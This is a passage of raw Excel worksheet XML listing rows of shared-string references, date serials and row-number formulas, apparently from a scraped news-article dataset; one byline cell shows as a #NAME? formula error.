      <c r="F15880" t="s">
        <v>9975</v>
      </c>
      <c r="G15880" t="s">
        <v>26660</v>
      </c>
    </row>
    <row r="15881" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15881">
        <f t="shared" si="248"/>
        <v>15880</v>
      </c>
      <c r="B15881">
        <v>880</v>
      </c>
      <c r="C15881" t="s">
        <v>25497</v>
      </c>
      <c r="D15881" s="1">
        <v>43672</v>
      </c>
      <c r="E15881" t="s">
        <v>26661</v>
      </c>
      <c r="F15881" t="s">
        <v>9975</v>
      </c>
      <c r="G15881" t="s">
        <v>26662</v>
      </c>
    </row>
    <row r="15882" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15882">
        <f t="shared" si="248"/>
        <v>15881</v>
      </c>
      <c r="B15882">
        <v>881</v>
      </c>
      <c r="C15882" t="s">
        <v>25497</v>
      </c>
      <c r="D15882" s="1">
        <v>43669</v>
      </c>
      <c r="F15882" t="s">
        <v>9975</v>
      </c>
      <c r="G15882" t="s">
        <v>26663</v>
      </c>
    </row>
    <row r="15883" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15883">
        <f t="shared" si="248"/>
        <v>15882</v>
      </c>
      <c r="B15883">
        <v>882</v>
      </c>
      <c r="C15883" t="s">
        <v>25497</v>
      </c>
      <c r="D15883" s="1">
        <v>43669</v>
      </c>
      <c r="F15883" t="s">
        <v>10526</v>
      </c>
      <c r="G15883" t="s">
        <v>26664</v>
      </c>
    </row>
    <row r="15884" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15884">
        <f t="shared" si="248"/>
        <v>15883</v>
      </c>
      <c r="B15884">
        <v>883</v>
      </c>
      <c r="C15884" t="s">
        <v>25497</v>
      </c>
      <c r="D15884" s="1">
        <v>43677</v>
      </c>
      <c r="F15884" t="s">
        <v>9975</v>
      </c>
      <c r="G15884" t="s">
        <v>26665</v>
      </c>
    </row>
    <row r="15885" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15885">
        <f t="shared" si="248"/>
        <v>15884</v>
      </c>
      <c r="B15885">
        <v>884</v>
      </c>
      <c r="C15885" t="s">
        <v>25497</v>
      </c>
      <c r="D15885" s="1">
        <v>43675</v>
      </c>
      <c r="F15885" t="s">
        <v>9978</v>
      </c>
      <c r="G15885" t="s">
        <v>26666</v>
      </c>
    </row>
    <row r="15886" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15886">
        <f t="shared" si="248"/>
        <v>15885</v>
      </c>
      <c r="B15886">
        <v>885</v>
      </c>
      <c r="C15886" t="s">
        <v>25497</v>
      </c>
      <c r="D15886" s="1">
        <v>43668</v>
      </c>
      <c r="E15886" t="s">
        <v>25517</v>
      </c>
      <c r="F15886" t="s">
        <v>9975</v>
      </c>
      <c r="G15886" t="s">
        <v>26667</v>
      </c>
    </row>
    <row r="15887" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15887">
        <f t="shared" si="248"/>
        <v>15886</v>
      </c>
      <c r="B15887">
        <v>886</v>
      </c>
      <c r="C15887" t="s">
        <v>25497</v>
      </c>
      <c r="D15887" s="1">
        <v>43670</v>
      </c>
      <c r="E15887" t="s">
        <v>25789</v>
      </c>
      <c r="F15887" t="s">
        <v>9975</v>
      </c>
      <c r="G15887" t="s">
        <v>26668</v>
      </c>
    </row>
    <row r="15888" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15888">
        <f t="shared" si="248"/>
        <v>15887</v>
      </c>
      <c r="B15888">
        <v>887</v>
      </c>
      <c r="C15888" t="s">
        <v>25497</v>
      </c>
      <c r="D15888" s="1">
        <v>43677</v>
      </c>
      <c r="E15888" t="s">
        <v>25512</v>
      </c>
      <c r="F15888" t="s">
        <v>9975</v>
      </c>
      <c r="G15888" t="s">
        <v>26669</v>
      </c>
    </row>
    <row r="15889" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15889">
        <f t="shared" si="248"/>
        <v>15888</v>
      </c>
      <c r="B15889">
        <v>888</v>
      </c>
      <c r="C15889" t="s">
        <v>25497</v>
      </c>
      <c r="D15889" s="1">
        <v>43670</v>
      </c>
      <c r="F15889" t="s">
        <v>9975</v>
      </c>
      <c r="G15889" t="s">
        <v>26670</v>
      </c>
    </row>
    <row r="15890" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15890">
        <f t="shared" si="248"/>
        <v>15889</v>
      </c>
      <c r="B15890">
        <v>889</v>
      </c>
      <c r="C15890" t="s">
        <v>25497</v>
      </c>
      <c r="D15890" s="1">
        <v>43669</v>
      </c>
      <c r="E15890" t="e">
        <f>- By By DOUG FEINBERG - AP Basketball Writer</f>
        <v>#NAME?</v>
      </c>
      <c r="F15890" t="s">
        <v>9975</v>
      </c>
      <c r="G15890" t="s">
        <v>26671</v>
      </c>
    </row>
    <row r="15891" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15891">
        <f t="shared" si="248"/>
        <v>15890</v>
      </c>
      <c r="B15891">
        <v>890</v>
      </c>
      <c r="C15891" t="s">
        <v>25497</v>
      </c>
      <c r="D15891" s="1">
        <v>43670</v>
      </c>
      <c r="E15891" t="s">
        <v>26672</v>
      </c>
      <c r="F15891" t="s">
        <v>10021</v>
      </c>
      <c r="G15891" t="s">
        <v>26673</v>
      </c>
    </row>
    <row r="15892" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15892">
        <f t="shared" si="248"/>
        <v>15891</v>
      </c>
      <c r="B15892">
        <v>891</v>
      </c>
      <c r="C15892" t="s">
        <v>25497</v>
      </c>
      <c r="D15892" s="1">
        <v>43676</v>
      </c>
      <c r="F15892" t="s">
        <v>9975</v>
      </c>
      <c r="G15892" t="s">
        <v>26674</v>
      </c>
    </row>
    <row r="15893" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15893">
        <f t="shared" si="248"/>
        <v>15892</v>
      </c>
      <c r="B15893">
        <v>892</v>
      </c>
      <c r="C15893" t="s">
        <v>25497</v>
      </c>
      <c r="D15893" s="1">
        <v>43668</v>
      </c>
      <c r="E15893" t="s">
        <v>26675</v>
      </c>
      <c r="F15893" t="s">
        <v>9975</v>
      </c>
      <c r="G15893" t="s">
        <v>26676</v>
      </c>
    </row>
    <row r="15894" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15894">
        <f t="shared" si="248"/>
        <v>15893</v>
      </c>
      <c r="B15894">
        <v>893</v>
      </c>
      <c r="C15894" t="s">
        <v>25497</v>
      </c>
      <c r="D15894" s="1">
        <v>43669</v>
      </c>
      <c r="F15894" t="s">
        <v>9975</v>
      </c>
      <c r="G15894" t="s">
        <v>26677</v>
      </c>
    </row>
    <row r="15895" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15895">
        <f t="shared" si="248"/>
        <v>15894</v>
      </c>
      <c r="B15895">
        <v>894</v>
      </c>
      <c r="C15895" t="s">
        <v>25497</v>
      </c>
      <c r="D15895" s="1">
        <v>43673</v>
      </c>
      <c r="E15895" t="s">
        <v>26678</v>
      </c>
      <c r="F15895" t="s">
        <v>9975</v>
      </c>
      <c r="G15895" t="s">
        <v>26679</v>
      </c>
    </row>
    <row r="15896" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15896">
        <f t="shared" si="248"/>
        <v>15895</v>
      </c>
      <c r="B15896">
        <v>895</v>
      </c>
      <c r="C15896" t="s">
        <v>25497</v>
      </c>
      <c r="D15896" s="1">
        <v>43674</v>
      </c>
      <c r="F15896" t="s">
        <v>9975</v>
      </c>
      <c r="G15896" t="s">
        <v>26680</v>
      </c>
    </row>
    <row r="15897" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15897">
        <f t="shared" si="248"/>
        <v>15896</v>
      </c>
      <c r="B15897">
        <v>896</v>
      </c>
      <c r="C15897" t="s">
        <v>25497</v>
      </c>
      <c r="D15897" s="1">
        <v>43674</v>
      </c>
      <c r="F15897" t="s">
        <v>9975</v>
      </c>
      <c r="G15897" t="s">
        <v>26681</v>
      </c>
    </row>
    <row r="15898" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15898">
        <f t="shared" si="248"/>
        <v>15897</v>
      </c>
      <c r="B15898">
        <v>897</v>
      </c>
      <c r="C15898" t="s">
        <v>25497</v>
      </c>
      <c r="D15898" s="1">
        <v>43677</v>
      </c>
      <c r="E15898" t="s">
        <v>26682</v>
      </c>
      <c r="F15898" t="s">
        <v>9975</v>
      </c>
      <c r="G15898" t="s">
        <v>26683</v>
      </c>
    </row>
    <row r="15899" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15899">
        <f t="shared" si="248"/>
        <v>15898</v>
      </c>
      <c r="B15899">
        <v>898</v>
      </c>
      <c r="C15899" t="s">
        <v>25497</v>
      </c>
      <c r="D15899" s="1">
        <v>43677</v>
      </c>
      <c r="E15899" t="s">
        <v>25592</v>
      </c>
      <c r="F15899" t="s">
        <v>9975</v>
      </c>
      <c r="G15899" t="s">
        <v>26076</v>
      </c>
    </row>
    <row r="15900" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15900">
        <f t="shared" si="248"/>
        <v>15899</v>
      </c>
      <c r="B15900">
        <v>899</v>
      </c>
      <c r="C15900" t="s">
        <v>25497</v>
      </c>
      <c r="D15900" s="1">
        <v>43668</v>
      </c>
      <c r="F15900" t="s">
        <v>9975</v>
      </c>
      <c r="G15900" t="s">
        <v>26684</v>
      </c>
    </row>
    <row r="15901" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15901">
        <f t="shared" si="248"/>
        <v>15900</v>
      </c>
      <c r="B15901">
        <v>900</v>
      </c>
      <c r="C15901" t="s">
        <v>25497</v>
      </c>
      <c r="D15901" s="1">
        <v>43676</v>
      </c>
      <c r="E15901" t="s">
        <v>19705</v>
      </c>
      <c r="F15901" t="s">
        <v>9975</v>
      </c>
      <c r="G15901" t="s">
        <v>26685</v>
      </c>
    </row>
    <row r="15902" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15902">
        <f t="shared" si="248"/>
        <v>15901</v>
      </c>
      <c r="B15902">
        <v>901</v>
      </c>
      <c r="C15902" t="s">
        <v>25497</v>
      </c>
      <c r="D15902" s="1">
        <v>43674</v>
      </c>
      <c r="F15902" t="s">
        <v>9975</v>
      </c>
      <c r="G15902" t="s">
        <v>26686</v>
      </c>
    </row>
    <row r="15903" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15903">
        <f t="shared" si="248"/>
        <v>15902</v>
      </c>
      <c r="B15903">
        <v>902</v>
      </c>
      <c r="C15903" t="s">
        <v>25497</v>
      </c>
      <c r="D15903" s="1">
        <v>43668</v>
      </c>
      <c r="E15903" t="s">
        <v>25509</v>
      </c>
      <c r="F15903" t="s">
        <v>10021</v>
      </c>
      <c r="G15903" t="s">
        <v>26687</v>
      </c>
    </row>
    <row r="15904" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15904">
        <f t="shared" si="248"/>
        <v>15903</v>
      </c>
      <c r="B15904">
        <v>903</v>
      </c>
      <c r="C15904" t="s">
        <v>25497</v>
      </c>
      <c r="D15904" s="1">
        <v>43670</v>
      </c>
      <c r="F15904" t="s">
        <v>10526</v>
      </c>
      <c r="G15904" t="s">
        <v>26688</v>
      </c>
    </row>
    <row r="15905" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15905">
        <f t="shared" si="248"/>
        <v>15904</v>
      </c>
      <c r="B15905">
        <v>904</v>
      </c>
      <c r="C15905" t="s">
        <v>25497</v>
      </c>
      <c r="D15905" s="1">
        <v>43672</v>
      </c>
      <c r="F15905" t="s">
        <v>9975</v>
      </c>
      <c r="G15905" t="s">
        <v>26689</v>
      </c>
    </row>
    <row r="15906" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15906">
        <f t="shared" si="248"/>
        <v>15905</v>
      </c>
      <c r="B15906">
        <v>905</v>
      </c>
      <c r="C15906" t="s">
        <v>25497</v>
      </c>
      <c r="D15906" s="1">
        <v>43672</v>
      </c>
      <c r="E15906" t="s">
        <v>26690</v>
      </c>
      <c r="F15906" t="s">
        <v>9975</v>
      </c>
      <c r="G15906" t="s">
        <v>26691</v>
      </c>
    </row>
    <row r="15907" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15907">
        <f t="shared" si="248"/>
        <v>15906</v>
      </c>
      <c r="B15907">
        <v>906</v>
      </c>
      <c r="C15907" t="s">
        <v>25497</v>
      </c>
      <c r="D15907" s="1">
        <v>43672</v>
      </c>
      <c r="E15907" t="s">
        <v>25517</v>
      </c>
      <c r="F15907" t="s">
        <v>9975</v>
      </c>
      <c r="G15907" t="s">
        <v>26692</v>
      </c>
    </row>
    <row r="15908" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15908">
        <f t="shared" si="248"/>
        <v>15907</v>
      </c>
      <c r="B15908">
        <v>907</v>
      </c>
      <c r="C15908" t="s">
        <v>25497</v>
      </c>
      <c r="D15908" s="1">
        <v>43671</v>
      </c>
      <c r="F15908" t="s">
        <v>9978</v>
      </c>
      <c r="G15908" t="s">
        <v>26693</v>
      </c>
    </row>
    <row r="15909" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15909">
        <f t="shared" si="248"/>
        <v>15908</v>
      </c>
      <c r="B15909">
        <v>908</v>
      </c>
      <c r="C15909" t="s">
        <v>25497</v>
      </c>
      <c r="D15909" s="1">
        <v>43672</v>
      </c>
      <c r="E15909" t="s">
        <v>26694</v>
      </c>
      <c r="F15909" t="s">
        <v>9975</v>
      </c>
      <c r="G15909" t="s">
        <v>26695</v>
      </c>
    </row>
    <row r="15910" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15910">
        <f t="shared" si="248"/>
        <v>15909</v>
      </c>
      <c r="B15910">
        <v>909</v>
      </c>
      <c r="C15910" t="s">
        <v>25497</v>
      </c>
      <c r="D15910" s="1">
        <v>43676</v>
      </c>
      <c r="E15910" t="s">
        <v>26696</v>
      </c>
      <c r="F15910" t="s">
        <v>10021</v>
      </c>
      <c r="G15910" t="s">
        <v>26697</v>
      </c>
    </row>
    <row r="15911" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15911">
        <f t="shared" si="248"/>
        <v>15910</v>
      </c>
      <c r="B15911">
        <v>910</v>
      </c>
      <c r="C15911" t="s">
        <v>25497</v>
      </c>
      <c r="D15911" s="1">
        <v>43668</v>
      </c>
      <c r="E15911" t="s">
        <v>26698</v>
      </c>
      <c r="F15911" t="s">
        <v>9975</v>
      </c>
      <c r="G15911" t="s">
        <v>26699</v>
      </c>
    </row>
    <row r="15912" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15912">
        <f t="shared" si="248"/>
        <v>15911</v>
      </c>
      <c r="B15912">
        <v>911</v>
      </c>
      <c r="C15912" t="s">
        <v>25497</v>
      </c>
      <c r="D15912" s="1">
        <v>43677</v>
      </c>
      <c r="E15912" t="s">
        <v>26700</v>
      </c>
      <c r="F15912" t="s">
        <v>9978</v>
      </c>
      <c r="G15912" t="s">
        <v>26701</v>
      </c>
    </row>
    <row r="15913" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15913">
        <f t="shared" si="248"/>
        <v>15912</v>
      </c>
      <c r="B15913">
        <v>912</v>
      </c>
      <c r="C15913" t="s">
        <v>25497</v>
      </c>
      <c r="D15913" s="1">
        <v>43669</v>
      </c>
      <c r="E15913" t="s">
        <v>25517</v>
      </c>
      <c r="F15913" t="s">
        <v>9975</v>
      </c>
      <c r="G15913" t="s">
        <v>26702</v>
      </c>
    </row>
    <row r="15914" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15914">
        <f t="shared" si="248"/>
        <v>15913</v>
      </c>
      <c r="B15914">
        <v>913</v>
      </c>
      <c r="C15914" t="s">
        <v>25497</v>
      </c>
      <c r="D15914" s="1">
        <v>43674</v>
      </c>
      <c r="E15914" t="s">
        <v>26703</v>
      </c>
      <c r="F15914" t="s">
        <v>9975</v>
      </c>
      <c r="G15914" t="s">
        <v>26704</v>
      </c>
    </row>
    <row r="15915" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15915">
        <f t="shared" si="248"/>
        <v>15914</v>
      </c>
      <c r="B15915">
        <v>914</v>
      </c>
      <c r="C15915" t="s">
        <v>25497</v>
      </c>
      <c r="D15915" s="1">
        <v>43675</v>
      </c>
      <c r="E15915" t="s">
        <v>26245</v>
      </c>
      <c r="F15915" t="s">
        <v>9975</v>
      </c>
      <c r="G15915" t="s">
        <v>26705</v>
      </c>
    </row>
    <row r="15916" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15916">
        <f t="shared" si="248"/>
        <v>15915</v>
      </c>
      <c r="B15916">
        <v>915</v>
      </c>
      <c r="C15916" t="s">
        <v>25497</v>
      </c>
      <c r="D15916" s="1">
        <v>43677</v>
      </c>
      <c r="F15916" t="s">
        <v>9975</v>
      </c>
      <c r="G15916" t="s">
        <v>26706</v>
      </c>
    </row>
    <row r="15917" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15917">
        <f t="shared" si="248"/>
        <v>15916</v>
      </c>
      <c r="B15917">
        <v>916</v>
      </c>
      <c r="C15917" t="s">
        <v>25497</v>
      </c>
      <c r="D15917" s="1">
        <v>43676</v>
      </c>
      <c r="E15917" t="s">
        <v>21881</v>
      </c>
      <c r="F15917" t="s">
        <v>10526</v>
      </c>
      <c r="G15917" t="s">
        <v>26707</v>
      </c>
    </row>
    <row r="15918" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15918">
        <f t="shared" si="248"/>
        <v>15917</v>
      </c>
      <c r="B15918">
        <v>917</v>
      </c>
      <c r="C15918" t="s">
        <v>25497</v>
      </c>
      <c r="D15918" s="1">
        <v>43672</v>
      </c>
      <c r="F15918" t="s">
        <v>10021</v>
      </c>
      <c r="G15918" t="s">
        <v>26708</v>
      </c>
    </row>
    <row r="15919" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15919">
        <f t="shared" si="248"/>
        <v>15918</v>
      </c>
      <c r="B15919">
        <v>918</v>
      </c>
      <c r="C15919" t="s">
        <v>25497</v>
      </c>
      <c r="D15919" s="1">
        <v>43676</v>
      </c>
      <c r="E15919" t="s">
        <v>25517</v>
      </c>
      <c r="F15919" t="s">
        <v>9975</v>
      </c>
      <c r="G15919" t="s">
        <v>26709</v>
      </c>
    </row>
    <row r="15920" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15920">
        <f t="shared" si="248"/>
        <v>15919</v>
      </c>
      <c r="B15920">
        <v>919</v>
      </c>
      <c r="C15920" t="s">
        <v>25497</v>
      </c>
      <c r="D15920" s="1">
        <v>43671</v>
      </c>
      <c r="E15920" t="s">
        <v>26710</v>
      </c>
      <c r="F15920" t="s">
        <v>9975</v>
      </c>
      <c r="G15920" t="s">
        <v>26711</v>
      </c>
    </row>
    <row r="15921" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15921">
        <f t="shared" si="248"/>
        <v>15920</v>
      </c>
      <c r="B15921">
        <v>920</v>
      </c>
      <c r="C15921" t="s">
        <v>25497</v>
      </c>
      <c r="D15921" s="1">
        <v>43668</v>
      </c>
      <c r="E15921" t="s">
        <v>26712</v>
      </c>
      <c r="F15921" t="s">
        <v>9975</v>
      </c>
      <c r="G15921" t="s">
        <v>26713</v>
      </c>
    </row>
    <row r="15922" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15922">
        <f t="shared" si="248"/>
        <v>15921</v>
      </c>
      <c r="B15922">
        <v>921</v>
      </c>
      <c r="C15922" t="s">
        <v>25497</v>
      </c>
      <c r="D15922" s="1">
        <v>43669</v>
      </c>
      <c r="E15922" t="s">
        <v>26714</v>
      </c>
      <c r="F15922" t="s">
        <v>9975</v>
      </c>
      <c r="G15922" t="s">
        <v>26715</v>
      </c>
    </row>
    <row r="15923" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15923">
        <f t="shared" si="248"/>
        <v>15922</v>
      </c>
      <c r="B15923">
        <v>922</v>
      </c>
      <c r="C15923" t="s">
        <v>25497</v>
      </c>
      <c r="D15923" s="1">
        <v>43671</v>
      </c>
      <c r="E15923" t="s">
        <v>25609</v>
      </c>
      <c r="F15923" t="s">
        <v>9975</v>
      </c>
      <c r="G15923" t="s">
        <v>26716</v>
      </c>
    </row>
    <row r="15924" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15924">
        <f t="shared" si="248"/>
        <v>15923</v>
      </c>
      <c r="B15924">
        <v>923</v>
      </c>
      <c r="C15924" t="s">
        <v>25497</v>
      </c>
      <c r="D15924" s="1">
        <v>43671</v>
      </c>
      <c r="E15924" t="s">
        <v>26717</v>
      </c>
      <c r="F15924" t="s">
        <v>9978</v>
      </c>
      <c r="G15924" t="s">
        <v>26718</v>
      </c>
    </row>
    <row r="15925" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15925">
        <f t="shared" si="248"/>
        <v>15924</v>
      </c>
      <c r="B15925">
        <v>924</v>
      </c>
      <c r="C15925" t="s">
        <v>25497</v>
      </c>
      <c r="D15925" s="1">
        <v>43668</v>
      </c>
      <c r="E15925" t="s">
        <v>25592</v>
      </c>
      <c r="F15925" t="s">
        <v>9975</v>
      </c>
      <c r="G15925" t="s">
        <v>26719</v>
      </c>
    </row>
    <row r="15926" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15926">
        <f t="shared" si="248"/>
        <v>15925</v>
      </c>
      <c r="B15926">
        <v>925</v>
      </c>
      <c r="C15926" t="s">
        <v>25497</v>
      </c>
      <c r="D15926" s="1">
        <v>43670</v>
      </c>
      <c r="E15926" t="s">
        <v>25509</v>
      </c>
      <c r="F15926" t="s">
        <v>10021</v>
      </c>
      <c r="G15926" t="s">
        <v>26720</v>
      </c>
    </row>
    <row r="15927" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15927">
        <f t="shared" si="248"/>
        <v>15926</v>
      </c>
      <c r="B15927">
        <v>926</v>
      </c>
      <c r="C15927" t="s">
        <v>25497</v>
      </c>
      <c r="D15927" s="1">
        <v>43677</v>
      </c>
      <c r="E15927" t="s">
        <v>25509</v>
      </c>
      <c r="F15927" t="s">
        <v>10021</v>
      </c>
      <c r="G15927" t="s">
        <v>26721</v>
      </c>
    </row>
    <row r="15928" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15928">
        <f t="shared" si="248"/>
        <v>15927</v>
      </c>
      <c r="B15928">
        <v>927</v>
      </c>
      <c r="C15928" t="s">
        <v>25497</v>
      </c>
      <c r="D15928" s="1">
        <v>43669</v>
      </c>
      <c r="E15928" t="s">
        <v>26722</v>
      </c>
      <c r="F15928" t="s">
        <v>9975</v>
      </c>
      <c r="G15928" t="s">
        <v>26723</v>
      </c>
    </row>
    <row r="15929" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15929">
        <f t="shared" si="248"/>
        <v>15928</v>
      </c>
      <c r="B15929">
        <v>928</v>
      </c>
      <c r="C15929" t="s">
        <v>25497</v>
      </c>
      <c r="D15929" s="1">
        <v>43676</v>
      </c>
      <c r="E15929" t="s">
        <v>26171</v>
      </c>
      <c r="F15929" t="s">
        <v>9975</v>
      </c>
      <c r="G15929" t="s">
        <v>26724</v>
      </c>
    </row>
    <row r="15930" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15930">
        <f t="shared" si="248"/>
        <v>15929</v>
      </c>
      <c r="B15930">
        <v>929</v>
      </c>
      <c r="C15930" t="s">
        <v>25497</v>
      </c>
      <c r="D15930" s="1">
        <v>43675</v>
      </c>
      <c r="E15930" t="s">
        <v>25860</v>
      </c>
      <c r="F15930" t="s">
        <v>9975</v>
      </c>
      <c r="G15930" t="s">
        <v>26725</v>
      </c>
    </row>
    <row r="15931" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15931">
        <f t="shared" si="248"/>
        <v>15930</v>
      </c>
      <c r="B15931">
        <v>930</v>
      </c>
      <c r="C15931" t="s">
        <v>25497</v>
      </c>
      <c r="D15931" s="1">
        <v>43673</v>
      </c>
      <c r="F15931" t="s">
        <v>9975</v>
      </c>
      <c r="G15931" t="s">
        <v>26726</v>
      </c>
    </row>
    <row r="15932" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15932">
        <f t="shared" si="248"/>
        <v>15931</v>
      </c>
      <c r="B15932">
        <v>931</v>
      </c>
      <c r="C15932" t="s">
        <v>25497</v>
      </c>
      <c r="D15932" s="1">
        <v>43674</v>
      </c>
      <c r="F15932" t="s">
        <v>9975</v>
      </c>
      <c r="G15932" t="s">
        <v>26727</v>
      </c>
    </row>
    <row r="15933" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15933">
        <f t="shared" si="248"/>
        <v>15932</v>
      </c>
      <c r="B15933">
        <v>932</v>
      </c>
      <c r="C15933" t="s">
        <v>25497</v>
      </c>
      <c r="D15933" s="1">
        <v>43669</v>
      </c>
      <c r="F15933" t="s">
        <v>9975</v>
      </c>
      <c r="G15933" t="s">
        <v>26728</v>
      </c>
    </row>
    <row r="15934" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15934">
        <f t="shared" si="248"/>
        <v>15933</v>
      </c>
      <c r="B15934">
        <v>933</v>
      </c>
      <c r="C15934" t="s">
        <v>25497</v>
      </c>
      <c r="D15934" s="1">
        <v>43669</v>
      </c>
      <c r="E15934" t="s">
        <v>26729</v>
      </c>
      <c r="F15934" t="s">
        <v>10526</v>
      </c>
      <c r="G15934" t="s">
        <v>26730</v>
      </c>
    </row>
    <row r="15935" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15935">
        <f t="shared" si="248"/>
        <v>15934</v>
      </c>
      <c r="B15935">
        <v>934</v>
      </c>
      <c r="C15935" t="s">
        <v>25497</v>
      </c>
      <c r="D15935" s="1">
        <v>43677</v>
      </c>
      <c r="F15935" t="s">
        <v>9978</v>
      </c>
      <c r="G15935" t="s">
        <v>26731</v>
      </c>
    </row>
    <row r="15936" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15936">
        <f t="shared" si="248"/>
        <v>15935</v>
      </c>
      <c r="B15936">
        <v>935</v>
      </c>
      <c r="C15936" t="s">
        <v>25497</v>
      </c>
      <c r="D15936" s="1">
        <v>43669</v>
      </c>
      <c r="E15936" t="s">
        <v>25592</v>
      </c>
      <c r="F15936" t="s">
        <v>9975</v>
      </c>
      <c r="G15936" t="s">
        <v>26732</v>
      </c>
    </row>
    <row r="15937" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15937">
        <f t="shared" si="248"/>
        <v>15936</v>
      </c>
      <c r="B15937">
        <v>936</v>
      </c>
      <c r="C15937" t="s">
        <v>25497</v>
      </c>
      <c r="D15937" s="1">
        <v>43668</v>
      </c>
      <c r="E15937" t="s">
        <v>25942</v>
      </c>
      <c r="F15937" t="s">
        <v>9975</v>
      </c>
      <c r="G15937" t="s">
        <v>26733</v>
      </c>
    </row>
    <row r="15938" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15938">
        <f t="shared" si="248"/>
        <v>15937</v>
      </c>
      <c r="B15938">
        <v>937</v>
      </c>
      <c r="C15938" t="s">
        <v>25497</v>
      </c>
      <c r="D15938" s="1">
        <v>43671</v>
      </c>
      <c r="E15938" t="s">
        <v>25509</v>
      </c>
      <c r="F15938" t="s">
        <v>10021</v>
      </c>
      <c r="G15938" t="s">
        <v>26734</v>
      </c>
    </row>
    <row r="15939" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15939">
        <f t="shared" ref="A15939:A16002" si="249">+ROW(A15938)</f>
        <v>15938</v>
      </c>
      <c r="B15939">
        <v>938</v>
      </c>
      <c r="C15939" t="s">
        <v>25497</v>
      </c>
      <c r="D15939" s="1">
        <v>43670</v>
      </c>
      <c r="E15939" t="s">
        <v>26735</v>
      </c>
      <c r="F15939" t="s">
        <v>9975</v>
      </c>
      <c r="G15939" t="s">
        <v>26736</v>
      </c>
    </row>
    <row r="15940" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15940">
        <f t="shared" si="249"/>
        <v>15939</v>
      </c>
      <c r="B15940">
        <v>939</v>
      </c>
      <c r="C15940" t="s">
        <v>25497</v>
      </c>
      <c r="D15940" s="1">
        <v>43670</v>
      </c>
      <c r="E15940" t="s">
        <v>25609</v>
      </c>
      <c r="F15940" t="s">
        <v>9975</v>
      </c>
      <c r="G15940" t="s">
        <v>26737</v>
      </c>
    </row>
    <row r="15941" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15941">
        <f t="shared" si="249"/>
        <v>15940</v>
      </c>
      <c r="B15941">
        <v>940</v>
      </c>
      <c r="C15941" t="s">
        <v>25497</v>
      </c>
      <c r="D15941" s="1">
        <v>43668</v>
      </c>
      <c r="F15941" t="s">
        <v>9975</v>
      </c>
      <c r="G15941" t="s">
        <v>26738</v>
      </c>
    </row>
    <row r="15942" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15942">
        <f t="shared" si="249"/>
        <v>15941</v>
      </c>
      <c r="B15942">
        <v>941</v>
      </c>
      <c r="C15942" t="s">
        <v>25497</v>
      </c>
      <c r="D15942" s="1">
        <v>43676</v>
      </c>
      <c r="E15942" t="s">
        <v>25805</v>
      </c>
      <c r="F15942" t="s">
        <v>9975</v>
      </c>
      <c r="G15942" t="s">
        <v>26739</v>
      </c>
    </row>
    <row r="15943" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15943">
        <f t="shared" si="249"/>
        <v>15942</v>
      </c>
      <c r="B15943">
        <v>942</v>
      </c>
      <c r="C15943" t="s">
        <v>25497</v>
      </c>
      <c r="D15943" s="1">
        <v>43669</v>
      </c>
      <c r="F15943" t="s">
        <v>9975</v>
      </c>
      <c r="G15943" t="s">
        <v>26740</v>
      </c>
    </row>
    <row r="15944" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15944">
        <f t="shared" si="249"/>
        <v>15943</v>
      </c>
      <c r="B15944">
